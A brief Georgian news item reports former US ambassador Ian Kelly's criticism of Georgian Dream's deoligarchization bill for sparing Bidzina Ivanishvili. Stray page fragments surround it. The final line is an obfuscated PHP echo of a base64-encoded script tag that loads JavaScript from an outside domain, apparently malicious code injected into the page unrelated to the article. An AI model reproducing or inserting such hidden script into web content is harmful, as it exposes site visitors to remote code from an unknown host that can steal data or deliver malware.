celsiusi
ავერსი შნაიდერი

ამერიკის შეერთებული შტატების ყოფილი ელჩი საქართველოში, იან კელი დეოლიგარქიზაციზე "ქართული ოცნების" კანონპროექტს ეხმაურება, რომლის მიხედვითაც ოლიგარქთა სიაში ბიძინა ივანიშვილი არ მოიაზრება.

იან კელი წერს, რომ "ქართული ოცნება" ცდილობს, კანონი ბიძინა ივანიშვილს არ შეეხოს, რომელის დეოლიგარქიზაციაზეც ევროპარლამენტი საუბრობდა.

აშშ-ის ყოფილი ელჩი, კანონპროექტს "ევროინტეგრაციის სიმულაციას" უწოდებს და წერს, რომ ამით დასავლეთში არავინ მოტყუვდება.

"მათ უნდათ, [დეოლიგარქიზაციის] კანონს მიღმა დატოვონ ერთი ბიჭი, რომელიც ევროპარლამენტს სურდა. რატომ კარგავენ გადასახადის გადამხდელთა დროსა და ფულს? ევროინტეგრაციის ამ სიმულაციით არავინ მოტყუვდება", - წერს იან კელი.

ცნობისთვის, პარლამენტმა "დეოლიგარქიზაციის შესახებ" კანონპროექტი პირველი მოსმენით 3 ნოემბერს მიიღო. 

326
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");